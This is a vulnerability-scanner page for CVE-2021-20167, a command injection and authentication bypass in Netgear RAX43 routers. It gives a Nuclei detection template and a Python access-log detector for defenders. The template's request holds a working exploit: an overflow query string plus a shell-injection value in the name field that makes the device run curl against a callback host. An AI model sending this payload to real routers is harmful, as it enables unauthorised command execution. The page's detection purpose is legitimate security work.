Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
ID: CVE-2021-20167
Severity: high
Author: gy741
Tags: cve2021,cve,tenable,netgear,rce,router
Description

Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router contains a buffer overrun issue that can redirect control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.
YAML Source

```yaml
id: CVE-2021-20167

info:
  name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
  author: gy741
  severity: high
  description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router contains a buffer overrun issue that can redirect control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'
  remediation: Upgrade to newer release of the RAX43 firmware.
  reference:
    - https://www.tenable.com/security/research/tra-2021-55
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20166
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20167
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8
    cve-id: CVE-2021-20167
    cwe-id: CWE-77
    epss-score: 0.94822
    epss-percentile: 0.99273
    cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: rax43_firmware
  tags: cve2021,cve,tenable,netgear,rce,router

http:
  - raw:
      - |
        POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
        Host: {{Hostname}}

        "name":"';$(curl {{interactsh-url}});'", "email":"[email protected]"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4b0a00483046022100824c779429b23d46bd572f21e46545de1c2810e73257182215f6dcd6cef63862022100c0a530fafb9730d90ffc0e8d500a3e3b8b2f0efee97427809bc42f2fbfb08877:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities

This template is used with the Nuclei scanner to detect the vulnerability described above. Both matchers rely on an out-of-band callback (an interactsh HTTP interaction whose request carries a curl User-Agent), so the scanned device must be able to reach the interactsh server for the check to report a hit.

```
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-20167.yaml"
```
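From the defender's side, the request the template sends has two traits worth alerting on in web-server logs: an oversized query string on readycloud_control.cgi (the buffer overrun path) and shell metacharacters in the name field (the command injection). The following is an added example, not part of the Nuclei template or the Tenable advisory; the log format, the sample lines and the 128-byte threshold are assumptions.

```python
"""Flag access-log requests matching the CVE-2021-20166/20167 pattern against
readycloud_control.cgi. Added example for defenders; not the template's code."""
import re
from urllib.parse import urlsplit

# Constructed sample lines in Apache combined-style format (not real traffic).
# The first mimics the oversized query string the template sends.
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "POST /cgi-bin/readycloud_control.cgi?'
    + "1" * 256 + '/api/users HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '192.0.2.11 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/readycloud_control.cgi?'
    'page=status HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [10/Oct/2023:13:56:12 +0000] "GET /index.htm HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Assumed threshold: legitimate queries to this CGI are short; the overrun needs a long one.
QUERY_LEN_THRESHOLD = 128
# Shell constructs that have no business inside a user-supplied name value.
SHELL_META_RE = re.compile(r"\$\(|`|;|\|\||&&|\|")


def inspect_request(target, body=""):
    """Return the reasons a request to readycloud_control.cgi looks malicious ([] if benign)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/readycloud_control.cgi"):
        return []
    reasons = []
    if len(parts.query) > QUERY_LEN_THRESHOLD:
        reasons.append("oversized query string (%d bytes)" % len(parts.query))
    # Access logs carry no body; when a proxy/WAF log supplies one, inspect the name field.
    m = re.search(r'"name"\s*:\s*"([^"]*)"', body)
    if m and SHELL_META_RE.search(m.group(1)):
        reasons.append("shell metacharacters in name parameter")
    return reasons


def scan_log(text):
    """Return (ip, target, reasons) for each suspicious request line in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target[:60] + "...", "; ".join(reasons))
```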